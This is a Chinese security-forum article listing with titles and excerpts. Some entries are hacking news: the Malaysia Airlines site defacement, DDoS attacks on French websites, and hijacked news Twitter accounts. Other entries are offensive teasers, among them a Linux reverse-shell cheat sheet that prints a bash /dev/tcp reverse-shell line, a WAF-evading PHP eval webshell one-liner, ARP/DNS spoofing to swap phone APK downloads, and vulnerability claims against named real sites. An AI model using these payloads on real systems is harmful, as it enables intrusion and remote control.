文章列表
当当网(dangdang.com)某分站任意文件读取漏洞
当当网(dangdang.com)某分站任意文件读取漏洞
766游戏网(766.com)某分站sql注入+信息泄露漏洞
766游戏网(766.com)某分站sql注入+信息泄露漏洞
马航官网被黑现“客机失联” 黑客自称来自IS
马航官网截图据法新社报道,马来西亚航空公司官网26日被自称“伊斯兰国”的“圣战者”的黑客入侵,该黑客自称来自知名黑客组织LizardSquad,该组织因其之前对PSN和XboxLive等展开的臭名昭著的DDoS攻击而广为人知。报道称,目前还不能确定这一行动有何目的。但LizardSquad的官推上曾发文称“要在马航官
内网渗透之手机控制
最近一直在研究从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法,还望大牛多多指点!(一)环境: 目标机:192.168.247.130 渗透机kali:192.168.247.129 网关:192.168.247.2(二)用到的工具: 1.arpspoof 2.dnsspoof
简单说明一下KFC的WiFi原理及渗透思路和方法
两个月前,和朋友出来搞终端机,搞着搞着发现拿到权限后没啥意思了。就跑去KFC吃了一顿KFC。当然手没闲着,打开笔记本进入kali就是一顿扫。发现几个有意思的。果然和基友双剑合璧天下无敌啊!不出几分钟一堆东西都出来了,当时忘记拍照了,所以大家勉强看看吧。。。首先发现KFC的WiFi是很普遍的AP无缝
linux下各种反弹shell脚本
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。 bash版本:/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 pe
1.9万法国网站遭DDoS攻击,部分页面被纂改
在巴黎《查理周刊》遭遇恐怖袭击之后,有1.9万法国网站成为网络攻击的目标。法国军方网络战防御部门负责人Arnaud Coustilliere上将称,绝大多数攻击是三个伊斯兰黑客组织发动的:Middle East Cyber Army、Fallaga team和 Cyber Caliphate。大多数攻击是低水平的DDoS攻击,但有部分网站的页面遭到了攻击
过狗菜刀专用一句话简解及用法(不要再醉了)
论坛有个哥们儿服务器上查出来个“特殊的”一句话,代码如下:<?$Exp=strrev($_POST);eval($Exp($_POST));原帖:https://www.t00ls.com/thread-29107-1-1.html回帖的人基本都是醉了,因为里面有个大大的eval在那,所以大家都觉得这是个很SB的一句话,还过什么狗。。。事实上,这个一句话的确能过狗。而
合众社遭黑客袭击发布“世界大战”谣言 网络安全引关注
当地时间16日,美国第二大通讯社合众社在社交网站发布了这样几则消息:“中美海军在南海开战”、“第三次世界大战爆发”,字眼劲爆、吸人眼球,当然,这种假消息不攻也能自破。只是,一家著名的通讯社怎么会发出这么不负责任的消息呢?当地时间16日下午,合众社的社交网站账号发布“突发新闻”称,中国
美媒体社交网络账号被黑 发“中美在南海开战”谣言
央视报道截图《纽约邮报》和合众国际社的“推特”账户遭黑客劫持,发布“第三次世界大战爆发”等谣言据央视报道,美国东部时间1月16日,美国第二大通讯社合众国际社先后发出多条消息,称“美军“乔治·华盛顿”号航母被中国反舰导弹击中”,“美国海军目前正在南海同中国船只交战。”17日,美军方出面
